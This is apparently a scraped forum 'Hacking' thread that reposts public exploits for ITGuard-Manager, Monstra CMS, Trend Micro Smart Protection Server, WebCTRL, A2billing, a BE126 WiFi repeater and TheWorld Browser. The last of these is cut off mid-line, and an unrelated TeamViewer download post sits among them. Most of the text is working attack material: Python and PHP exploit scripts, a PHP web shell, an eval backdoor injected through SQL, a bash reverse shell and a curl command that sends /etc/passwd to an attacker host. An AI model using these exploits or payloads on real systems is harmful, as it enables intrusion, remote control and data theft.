    # Vulnerability Title: ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution # Author: Nassim Asrir # Contact: wassline@gmail.com / @asrir_nassim # CVE: Waiting ... # CVSS: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P # Vendor: http://www.innotube.com Details: ======== First we need to know what happens when we need to LogIn. When the User or Attacker insert any strings in the login form he/she will get this POST request: POST /cgi-bin/drknow.cgi?req=login HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://server/log-in.html?lang=KOR Content-Type: application/x-www-form-urlencoded Content-Length: 45 Connection: close Upgrade-Insecure-Requests: 1 req=login&lang=KOR&username=admin&password=admin Ok now we have this POST request and all we care about is the ‘username’ parameter . and we can execute our system commands via this parameter due to missing input sanitization. The payload will be: 'admin|'command'||x we will change the command by any *unix command (ls – id – mkdir ….) Exploit: ======= #i am not responsible for any wrong use. import requests target = raw_input('Target(With proto) : ') command = raw_input('Command To Execute : ') fullpath=target +"/cgi-bin/drknow.cgi?req=login" data = {'req':'login', 'lang':'ENG', 'username':'admin|'+command+'||x', 'password':'admin'} execute = requests.post(fullpath, data = data) print execute.text
  18. Exploit Title: Monstra CMS - 3.0.4 RCE Vendor Homepage: http://monstra.org/ Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip Discovered by: Ishaq Mohammed Contact: https://twitter.com/security_prince Website: https://about.me/security-prince Category: webapps Platform: PHP Advisory Link: https://blogs.securiteam.com/index.php/archives/3559 Description: MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to a remote command execution on the remote server. Vulnerable Code: https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php line 19: public static function main() { // Array of forbidden types $forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'php', 'phtml', 'php3', 'php4', 'php5', 'phps', 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd', 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty'); Proof of Concept Steps to Reproduce: 1. Login with a valid credentials of an Editor 2. Select Files option from the Drop-down menu of Content 3. Upload a file with PHP (uppercase)extension containing the below code: <?php $cmd=$_GET['cmd']; system($cmd); ?> 4. Click on Upload 5. Once the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc. Recommended Patch: We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support – though this is not an official status on their site (last official patch was released on 2012-11-29), the GitHub appears a bit more active (last commit from 2 years ago). The patch that addresses this bug is available here: https://github.com/monstra-cms/monstra/issues/426
  19. # Trend Micro Smart Protection Server Multiple Vulnerabilities ## 1. Advisory Information **Title:**: Trend Micro Smart Protection Server Multiple Vulnerabilities **Advisory ID:** CORE-2017-0008 **Advisory URL:** http://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilities **Date published:** 2017-12-19 **Date of last update:** 2017-12-11 **Vendors contacted:** Trend Micro **Release mode:** Coordinated release ## 2. Vulnerability Information **Class:** Information Exposure Through Log Files [[CWE-532](http://cwe.mitre.org/data/definitions/532.html)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](http://cwe.mitre.org/data/definitions/78.html)], Improper Control of Filename for Include/Require Statement in PHP Program [[CWE-98](http://cwe.mitre.org/data/definitions/98.html)], Improper Neutralization of Input During Web Page Generation [[CWE-79](http://cwe.mitre.org/data/definitions/79.html)], Improper Authorization [[CWE-285](http://cwe.mitre.org/data/definitions/285.html)] **Impact:** Code execution **Remotely Exploitable:** Yes **Locally Exploitable:** Yes **CVE Name:** [CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398), [CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094), [CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095), [CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096), [CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097) ## 3. Vulnerability Description Trend Micro's website states that: Trend Micro Smart Protection Server [(http://cwe.mitre.org/data/definitions/532.html)(https://www.coresecurity.com#SPS)] is a next-generation, in-the-cloud based, advanced protection solution. At the core of this solution is an advanced scanning architecture that leverages malware prevention signatures that are stored in-the-cloud. This solution leverages file reputation and Web reputation technology to detect security risks. The technology works by off loading a large number of malware prevention signatures and lists that were previously stored on endpoints to Trend Micro Smart Protection Server. Multiple vulnerabilities were found in the Smart Protection Server's Administration UI that would allow a remote unauthenticated attacker to execute arbitrary commands on the system. ## 4. Vulnerable Packages * Trend Micro Smart Protection Server 3.2 (Build 1085) Other products and versions might be affected, but they were not tested. ## 5. Vendor Information, Solutions and Workarounds Trend Micro published the following patches: * TMSPS3.0 - Critical Patch B1354 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4556®s=NABU&lang_loc=1#fragment-4628)) * TMSPS3.1 - Critical Patch B1057 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4974®s=NABU&lang_loc=1#fragment-5030)) ## 6. Credits These vulnerabilities were discovered and researched by Leandro Barragan and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. ## 7. Technical Description / Proof of Concept Code In section 7.1 we describe how an unauthenticated attacker could get a session token to perform authenticated requests against the application. Sections 7.2 and 7.3 describe two vectors to achieve remote command execution in the context of the Web application. Several public privilege escalation vulnerabilities exist that are still unpatched. In combination with the aforementioned vulnerabilities a remote unauthenticated attacker would be able to execute arbitrary system commands with root privileges. Sections 7.4 and 7.5 cover other common Web application vulnerabilities found in the product's console. ### 7.1 Session hijacking via log file disclosure [[CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398)] The application stores diagnostic logs in the /widget/repository/log/diagnostic.log file. Performing a login or some basic browsing will write several entries with the following format: ``` 2017-08-18 17:00:38,468,INFO,rti940901j0556161dudhj6805,null, Notice: Undefined index: param in /var/www/AdminUI/widget/inc/class/common/db/GenericDao.php on line 218 ``` Each log entry leaks the associated session ID next to the log alert level and can be accessed via HTTP without authenticating to the Web application. Therefore, an unauthenticated attacker can grab this file and hijack active user sessions to perform authenticated requests. ### 7.2 Remote command execution via cron job injection [[CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094)] The script admin_update_program.php is responsible for creating a cron job when software updates are scheduled. The HTTP request contains several parameters that are used without sanitization as part of the cron job created at /var/spool/cron/webserv. We will target the hidTimingMin parameter. File /var/www/AdminUI/php/admin_update_program.php: ``` if ($_SERVER['REQUEST_METHOD'] == 'POST'){ [...] $arr_au['Program']['AUScheduleTimingMin']= isset($_POST["hidTimingMin"])?$_POST["hidTimingMin"]:"0"; [...] if ( $arr_au['Program']['UseAUSchedule'] == "1"){ if ( $arr_au['Program']['AUScheduleType'] == "0" ){ $crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", "*"); }else { $crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", $arr_au['Program']['AUScheduleTimingDay']); } $crontab->setCommand("/usr/tmcss/bin/UpdateManage.exe --Program --Schedule > /dev/null 2>&1"); $crontab->saveCronFile(); } if(! $crontab->addToCrontab()){ header( 'Location: admin_update_program.php?status=savecrontaberror&sid='.$session_name ) ; exit; } ``` File /var/www/AdminUI/php/inc/crontab.php: ``` function setDateParams($min=NULL, $hour=NULL, $day=NULL, $month=NULL, $dayofweek=NULL){ if($min=="0") $this->minute=0; elseif($min) $this->minute=$min; else $this->minute="*"; if($hour=="0") $this->hour=0; elseif($hour) $this->hour=$hour; else $this->hour="*"; $this->month=($month) ? $month : "*"; $this->day=($day) ? $day : "*"; $this->dayofweek=($dayofweek != NULL) ? $dayofweek : "*"; } function saveCronFile(){ $command=$this->minute." ".$this->hour." ".$this->day." ".$this->month." ".$this->dayofweek." ".$this->command."n"; if(!fwrite($this->handle, $command)) return true; else return false; } function addToCrontab(){ if(!$this->filename) exit('No name specified for cron file'); $data=array(); exec("crontab ".escapeshellarg($this->directory.$this->filename),$data,$ret); if($ret==0) return true; else return false; } ``` The following python script creates a cron job that will run an arbitrary command on every minute. It also leverages the session hijacking vulnerability described in 7.1 to bypass the need of authentication. ``` #!/usr/bin/env python import requests import sys def exploit(host, port, command): session_id = get_session_id(host, port) print "[+] Obtained session id %s" % session_id execute_command(session_id, host, port, command) def get_session_id(host, port): url = "https://%s:%d/widget/repository/log/diagnostic.log" % (host, port) r = requests.get(url, verify=False) for line in r.text.split('n')[::-1]: if "INFO" in line or "ERROR" in line: return line.split(',')(http://cwe.mitre.org/data/definitions/98.html) def execute_command(session_id, host, port, command): print "[+] Executing command '%s' on %s:%d" % (command, host, port) url = "https://%s:%d/php/admin_update_program.php?sid=%s" % (host, port, session_id) multipart_data = { "ComponentSchedule": "on", "ComponentScheduleOS": "on", "ComponentScheduleService": "on", "ComponentScheduleWidget": "on", "useAUSchedule": "on", "auschedule_setting": "1", "update_method": "1", "update_method3": "on", "userfile": "", "sid": session_id, "hidComponentScheduleOS": "1", "hidComponentScheduleService": "1", "hidComponentScheduleWidget": "1", "hidUseAUSchedule": "1", "hidScheduleType": "1", "hidTimingDay": "2", "hidTimingHour": "2", "hidTimingMin": "* * * * * %s #" % command, "hidUpdateOption": "1", "hidUpdateNowFlag": "" } r = requests.post(url, data=multipart_data, cookies={session_id: session_id}, verify=False) if "MSG_UPDATE_UPDATE_SCHEDULE" in r.text: print "[+] Cron job added, enjoy!" else: print "[-] Session has probably timed out, try again later!" if __name__ == "__main__": exploit(sys.argv(http://cwe.mitre.org/data/definitions/532.html), int(sys.argv(http://cwe.mitre.org/data/definitions/78.html)), sys.argv(http://cwe.mitre.org/data/definitions/98.html)) ``` The following proof of concept opens a reverse shell to the attacker's machine. ``` $ python coso.py 192.168.45.186 4343 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' [+] Obtained session id q514un6ru6stcpf3k0n4putbd3 [+] Executing command 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' on 192.168.45.186:4343 [+] Cron job added, enjoy! $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.45.186] port 8888 [tcp/*] accepted (family 2, sport 59508) bash: no job control in this shell [webserv@ localhost ~]$ ``` ### 7.3 Remote command execution via local file inclusion [[CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095)] The /widget/inc/widget_package_manager.php script passes user provided input to the PHP require_once function without sanitization. However, there are some restrictions that need to be overcome in order to include arbitrary files, as the application appends PoolManager.php at the end of the filename. File /var/www/AdminUI/widget/inc/widget_package_manager.php: ``` switch($widgetRequest['act']){ case "check": try{ // $strUpdateType = widget, configure_widget_and_widget_component $strUpdateType = isset($widgetRequest['update_type']) ? $widgetRequest['update_type'] : 'widget'; $strFuncName = 'is'.WF::getTypeFactory()->getString()->getUpperCamelCase($strUpdateType).'Update'; $isUpdate = WF::getWidgetPoolFactory()->getWidgetPoolManager($strUpdateType)->$strFuncName(); [...] ``` File /var/www/AdminUI/widget/inc/class/widgetPool/WidgetPoolFactory.abstract.php: ``` public function getWidgetPoolManager($strUpdateType = 'widget'){ if(! isset(self::$instance[__FUNCTION__][$strUpdateType])){ $strFileName = $this->objFramework->getTypeFactory()->getString()->getUpperCamelCase($strUpdateType); require_once (self::getDirnameFile() . '/widget/'.$strFileName.'PoolManager.php'); $strClassName = 'WF'.$strFileName.'PoolManager'; self::$instance[__FUNCTION__][$strUpdateType] = new $strClassName($this->objFramework); } return self::$instance[__FUNCTION__][$strUpdateType]; } ``` One way for an attacker to place an arbitrary file on the system is to abuse the update process that can be managed from the same product console. Files downloaded from alternate update sources are stored in the /var/tmcss/activeupdate directory. An attacker can setup a fake update server and trigger an update from it to download the malicious archive. As an example, we have packed a reverse shell named rshellPoolManager.php into the bf1747402402.zip archive. The following server.ini would instruct the application to download the archive and uncompress it inside /var/tmcss/activeupdate: ``` ; ======================================= ; ActiveUpdate 1.2 US ; ; Filename: Server.ini ; ; New Format AU 1.8 ; ; Last modified by AUJP1 10/14/2015 ; ======================================= [Common] Version=1.2 CertExpireDate=Jul 28 08:52:40 2019 GMT [Server] AvailableServer=1 Server.1=http://<serverIP>:1080/ AltServer=http://<serverIP>:1080/ Https=http://<serverIP>:1080/ [PATTERN] P.48040039=pattern/bf1747402402.zip,1747402402,257 ``` After triggering an update from the Web console, the PHP script is written to the expected location. ``` [root@ localhost activeupdate]# ls -lha /var/tmcss/activeupdate/ | grep php -rw-r--r--. 1 webserv webserv 66 ago 25 22:59 rshellPoolManager.php ``` The final step is to include the script and execute our payload. ``` POST /widget/inc/widget_package_manager.php?sid=dj0efdmskngvt4lbhakgc6cru7 HTTP/1.1 Host: 192.168.45.186:4343 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: application/json Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Request: JSON X-CSRFToken: dj0efdmskngvt4lbhakgc6cru7 Content-Type: application/json; charset=utf-8 Content-Length: 122 Cookie: dj0efdmskngvt4lbhakgc6cru7=dj0efdmskngvt4lbhakgc6cru7 Connection: close {"act": "check", "update_type": "../../../../../../../../../var/tmcss/activeupdate/rshell"} ``` Steven Seeley and Roberto Suggi Liverani presented various privilege escalation vectors to move from webserv to root on their presentation "I Got 99 Trends and a # Is All Of Them". Based on our testing the attacks remain unpatched, so we did not try to find additional ways to escalate privileges. ### 7.4 Stored cross-site scripting [[CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096)] The ru parameter of the wcs_bwlists_handler.php script is vulnerable to cross-site scripting. This endpoint is used to manage user defined URLs. After the rule is inserted, the payload will be executed every time the user opens the user defined URLs section. The following proof of concept stores code to open an alert box. ``` https://<serverIP>:4343/php/wcs_bwlists_handler.php?sid=2f03bf97fc4912ee&req=mgmt_insert&st=1&ac=0&ru=http%3A%2F%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E&rt=3&ipt=0&ip4=&ip4m=128&cn=&dn= ``` ### 7.5 Improper access control [[CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097)] The product console includes widgets that can be used to monitor other servers. Credentials to access the servers being monitored, widget logs and other information reside on a SQLite database which can be accessed without authentication at the following URL: ``` https://<serverIP>:4343/widget/repository/db/sqlite/tmwf.db ``` The credentials are stored using AES256 with a dynamic key. However, the key is also placed inside the Web server directories and available for download without authentication. ``` https://<serverIP>:4343/widget/repository/inc/class/common/crypt/crypt.key ``` This would allow an attacker to decrypt the contents of the database, rendering the encryption mechanism useless. ## 8 Report Timeline * **2017-09-04: **Core Security sent an initial notification to Trend Micro, including a draft advisory. * **2017-10-02: **Core Security asked for an update on the vulnerability reported. * **2017-10-02: ** Trend Micro stated they are still in the process of creating the official fix for the vulnerabilities reported. ETA for the fix should be end of this month (October) * **2017-11-13: **Core Security requested a status on the timeline for fixing the reported vulnerabilities since the original ETA was not accomplished. * **2017-11-14: ** Trend Micro stated they are still working on the Critical Patch and found problems along the way. Patch is now in QA. * **2017-11-20: ** Trend Micro informed availability for the fixes addressing 5 out of the 6 vulnerabilities reported. They stated one of the reported vulnerabilities is on a table where the SQL query is allowed and 'does not cause anything leaking'. Still in the process of localizing the critical patches for other regions. Will let us know when everything is covered in order to set a disclosure date. * **2017-11-21: **Core Security thanked the update and agreed on removing one of the reported vulnerabilities. * **2017-12-05: ** Trend Micro provided the CVE-ID for all the vulnerabilities reported and proposed the public disclosure date to be December 14th. * **2017-12-06: **Core Security thanked the update and proposed public disclosure date to be Tuesday December 19th @ 12pm EST. * **2017-12-19: ** Advisory CORE-2017-0008 published. ## 9 References http://cwe.mitre.org/data/definitions/532.html ## 10 About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: . ## 11 About Core Security Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [info@coresecurity.com](mailto:info%40coresecurity.com) ## 12 Disclaimer The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License:
  20. Moeein Seven

    soft-Windows

    دانلود این نرم افزار برای ویندوز https://www.microsoft.com/en-us/store/p/teamviewer-remote-control/9wzdncrfj0rh
  21. #!/usr/bin/env python # -*- coding: utf8 -*- # # # Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution # # # Vendor: Automated Logic Corporation # Product web page: http://www.automatedlogic.com # Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior # ALC WebCTRL, SiteScan Web 6.1 and prior # ALC WebCTRL, i-Vu 6.0 and prior # ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior # ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior # # Summary: WebCTRL®, Automated Logic's web-based building automation # system, is known for its intuitive user interface and powerful integration # capabilities. It allows building operators to optimize and manage # all of their building systems - including HVAC, lighting, fire, elevators, # and security - all within a single HVAC controls platform. It's everything # they need to keep occupants comfortable, manage energy conservation measures, # identify key operational problems, and validate the results. # # Desc: WebCTRL suffers from an authenticated arbitrary code execution # vulnerability. The issue is caused due to the improper verification # when uploading Add-on (.addons or .war) files using the uploadwarfile # servlet. This can be exploited to execute arbitrary code by uploading # a malicious web archive file that will run automatically and can be # accessed from within the webroot directory. Additionaly, an improper # authorization access control occurs when using the 'anonymous' user. # By specification, the anonymous user should not have permissions or # authorization to upload or install add-ons. In this case, when using # the anonymous user, an attacker is still able to upload a malicious # file via insecure direct object reference and execute arbitrary code. # The anonymous user was removed from version 6.5 of WebCTRL. # # Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601) # Apache-Coyote/1.1 # Apache Tomcat/7.0.42 # CJServer/1.1 # Java/1.7.0_25-b17 # Java HotSpot Server VM 23.25-b01 # Ant 1.7.0 # Axis 1.4 # Trove 2.0.2 # Xalan Java 2.4.1 # Xerces-J 2.6.1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2017-5431 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5431.php # # ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01 # CVE ID: CVE-2017-9650 # CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9650 # # # 30.01.2017 # # import itertools import mimetools import mimetypes import cookielib import binascii import urllib2 import urllib import sys import re import os from urllib2 import URLError global bindata __author__ = 'lqwrm' piton = os.path.basename(sys.argv[0]) def bannerche(): print ''' @-------------------------------------------------@ | | | WebCTRL 6.5 Authenticated RCE PoC | | ID: ZSL-2017-5431 | | Copyleft (c) 2017, Zero Science Lab | | | @-------------------------------------------------@ ''' if len(sys.argv) < 3: print '[+] Usage: '+piton+' <IP> <WAR FILE>' print '[+] Example: '+piton+' 10.0.0.17 webshell.war\n' sys.exit() bannerche() host = sys.argv[1] filename = sys.argv[2] with open(filename, 'rb') as f: content = f.read() hexo = binascii.hexlify(content) bindata = binascii.unhexlify(hexo) cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) print '[+] Probing target http://'+host try: checkhost = opener.open('http://'+host+'/index.jsp?operatorlocale=en') except urllib2.HTTPError, errorzio: if errorzio.code == 404: print '[!] Error 001:' print '[-] Check your target!' print sys.exit() except URLError, errorziocvaj: if errorziocvaj.reason: print '[!] Error 002:' print '[-] Check your target!' print sys.exit() print '[+] Target seems OK.' print '[+] Login please:' print ''' Default username: Administrator, Anonymous Default password: (blank), (blank) ''' username = raw_input('[*] Enter username: ') password = raw_input('[*] Enter password: ') login_data = urllib.urlencode({'pass':password, 'name':username, 'touchscr':'false'}) opener.addheaders = [('User-agent', 'Thrizilla/33.9')] login = opener.open('http://'+host+'/?language=en', login_data) auth = login.read() if re.search(r'productName = \'WebCTRL', auth): print '[+] Authenticated!' token = re.search('wbs=(.+?)&', auth).group(1) print '[+] Got wbs token: '+token cookie1, cookie2 = [str(c) for c in cj] cookie = cookie1[8:51] print '[+] Got cookie: '+cookie else: print '[-] Incorrect username or password.' print sys.exit() print '[+] Sending payload.' class MultiPartForm(object): def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary def add_field(self, name, value): self.form_fields.append((name, value)) return def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' self.files.append((fieldname, filename, mimetype, body)) return def __str__(self): parts = [] part_boundary = '--' + self.boundary parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields ) parts.extend( [ part_boundary, 'Content-Disposition: file; name="%s"; filename="%s"' % \ (field_name, filename), 'Content-Type: %s' % content_type, '', body, ] for field_name, filename, content_type, body in self.files ) flattened = list(itertools.chain(*parts)) flattened.append('--' + self.boundary + '--') flattened.append('') return '\r\n'.join(flattened) if __name__ == '__main__': form = MultiPartForm() form.add_field('wbs', token) form.add_field('file"; filename="'+filename, bindata) request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile') request.add_header('User-agent', 'SCADA/8.0') body = str(form) request.add_header('Content-type', form.get_content_type()) request.add_header('Cookie', cookie) request.add_header('Content-length', len(body)) request.add_data(body) request.get_data() urllib2.urlopen(request).read() print '[+] Payload uploaded.' print '[+] Shell available at: http://'+host+'/'+filename[:-4] print sys.exit()
  22. # Title : A2billing 2.x , Unauthenticated Backup dump / RCE flaw # Vulnerable software : A2billing 2.x # Author : Ahmed Sultan (0x4148) # Email : 0x4148@gmail.com # Home : 0x4148.com # Linkedin : https://www.linkedin.com/in/0x4148/ A2billing contain multiple flaws which can be chained together to achieve shell access over the a2b instance If you're looking for deep technical stuff , check out the full writeup at https://0x4148.com/2016/10/28/a2billing-rce/ 1 . backup dump Vulnerable code File : admin/public/form_data/FG_var_backup.inc getpost_ifset(array('name','path','creationdate')); $HD_Form = new FormHandler("cc_backup","Backup"); $HD_Form -> FG_DEBUG = 0; if ($form_action!='ask-add') check_demo_mode(); if ($form_action == 'add'){ $backup_file = $path; if (substr($backup_file,-3)=='.gz'){ // WE NEED TO GZIP $backup_file = substr($backup_file,0,-3); $do_gzip=1; } // Make the backup stuff here and redirect to success page //mysqldump -all --databases mya2billing -ua2billinguser -pa2billing > /tmp/test.sql //pg_dump -c -d -U a2billinguser -h localhost -f /tmp/test.sql mya2billing if (DB_TYPE != 'postgres'){ $run_backup=MYSQLDUMP." -all --databases ".DBNAME." -u'".USER."' -p'".PASS."' > '{$backup_file}'"; }else{ $env_var="PGPASSWORD='".PASS."'"; putenv($env_var); $run_backup=PG_DUMP." -c -d -U ".USER." -h ".HOST." -f '{$backup_file}' ".DBNAME; } if ($FG_DEBUG == 1 ) echo $run_backup."<br>"; >>>> exec($run_backup,$output,$error); if ($do_gzip){ // Compress file $run_gzip = GZIP_EXE." '$backup_file'"; if ($FG_DEBUG == 1 ) echo $run_gzip."<br>"; >>>> exec($run_gzip,$output,$error_zip); } File is being called at "admin/Public/A2B_entity_backup.php" before the authentication checking proccess take place so to dump full backup we can just move to : http://HOST//a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.sql backup will be found at admin/Public/0x4148.sql few hardening is being carried out by the application which did great job preventing direct RCE flaw , so we had to figure out sth else 2 . SQL injection File name : ckeckout_process.php Line 287 : $Query = "INSERT INTO cc_payments_agent ( agent_id, agent_name, agent_email_address, item_name, item_id, item_quantity, payment_method, cc_type, cc_owner, cc_number, " . " cc_expires, orders_status, last_modified, date_purchased, orders_date_finished, orders_amount, currency, currency_value) values (" . " '".$transaction_data[0][1]."', '".$customer_info[3]." ".$customer_info[2]."', '".$customer_info["email"]."', 'balance', '". $customer_info[0]."', 1, '$pmodule', '".$_SESSION["p_cardtype"]."', '".$transaction_data[0][5]."', '".$transaction_data[0][6]."', '". $transaction_data[0][7]."', $orderStatus, '".$nowDate."', '".$nowDate."', '".$nowDate."', ".$amount_paid.", '".$currCurrency."', '". $currencyObject->get_value($currCurrency)."' )"; $result = $DBHandle_max -> Execute($Query); By exploiting this flaw we can insert malicious data into the db using the following query <thanks to i-Hmx for the great hint> transactionID=456789111111 unise//**lecton selinse//**rtect 1,2,3,4,0x706c75676e706179,0x3c3f706870206576616c286261736536345f6465636f646528245f504f53545b6e61696c69745d29293b203f3e,7,8,9,10,11,12,13-//**- -&sess_id=4148&key=98346a2b29c131c78dc89b50894176eb After sending this request the following payload "<?php eval(base64_decode($_POST[nailit])); ?>" will be injected directly into the DB 3 . RCE after injecting the malicious code we can just dump backup again but this time we will name it "0x4148.php" , so our code can be executed :) [root@localhost Public]# curl ' https://127.0.0.1/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.php' --insecure [root@localhost Public]# cat 0x4148.php | grep nailit INSERT INTO `cc_payments_agent` VALUES (295,2,' ','','balance','',1,'plugnpay','','66666666666666666666666666666666666666666666','77777777777777777777777777777777','8',-1,'3.000000','2016-10-28 10:57:10','2016-10-28 10:57:10','2016-10-28 10:57:10','usd','0.000000'),(296,2,' ','','balance','',1,'plugnpay','','<?php eval(base64_decode($_POST[nailit])); ?>','7','8',-1,'3.000000','2016-10-28 10:58:22','2016-10-28 10:58:22','2016-10-28 10:58:22','usd','0.000000'); Now just exploit it via post nailit=base64_encoded php code to admin/Public/0x4148.php for instance system(‘x=$(cat /etc/passwd);curl -d “$x” http://x.x.x.x:8000/0x4148.jnk’); will read /etc/passwd and send it to our nc listener Exploit timeline : 01/10/2016 : vulnerability reported to vendor 06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP 04/09/2017 : Public release Credits, Ahmed Sultan - Cyber Security Analyst @ EG-CERT
  23. Anonyali

    Hacking

    # Exploit Title: WIFI Repeater BE126 – Remote Code Execution # Date Publish: 09/09/2017 # Exploit Authors: Hay Mizrachi, Omer Kaspi # Contact: haymizrachi@gmail.com, komerk0@gmail.com # Vendor Homepage: http://www.twsz.com # Category: Webapps # Version: 1.0 # Tested on: Windows/Ubuntu 16.04 # CVE: CVE-2017-13713 1 - Description: HTTP POST request that contains user parmater which can give us to run Remote Code Execution to the device. The parameter is not sanitized at all, which cause him to be vulnerable. 2 - Proof of Concept: curl -d "name=HTTP&url="http://www.test.com&user=;echo hacked!! > /var/mycode;&password=a&port=8&dir=a" --cookie "Cookie: sessionsid=XXXXX; auth=ok expires=Sun, 15-May-2112 01:45:46 GMT; langmanulset=yes; sys_UserName=admin; expires=Mon, 31-Jan-2112 16:00:00 GMT; language=en_us" -X POST http://beconnected.client/cgi-bin/webupg 3 - Timeline: 29/4/2017 – Vulnerability Discovered. 29/4/2017 - Vendor not responding. 03/09/2017 – Exploit published.
  24. Anonyali

    Hacking

    #!/usr/bin/php <?php ########################################################## # Author : Ehsan Noreddini # E-Mail : me@ehsann.info # Social : @prot3ct0r # Title : The World Browser Remote Code Execution # TheWorld Browser is a tiny, fast and powerful web Browser. It is completely free. There is no function limitation. # Version : 3.0 Final # Date : 22 October 2015 # CVE : CVE2014-6332 # Tested on : Windows7 # Download : http://theworld.cn/twen/download.html # Website : http://theworld.cn ########################################################## # 1. run php code : php exploit.php # 2. get the output address and open it in browser ! ########################################################## # shot : http://ehsann.info/proof/The_World_Browser_R_C_E.png # Original Code : http://ehsann.info/exploit/4.txt ########################################################## print "TheWorld Browser Remote Code Execution Exploit \r\n"; $port=80; # Port Address $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your malicious file $socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); socket_bind($socket, 0,$port); socket_listen($socket); # MS14-064 $msgd = 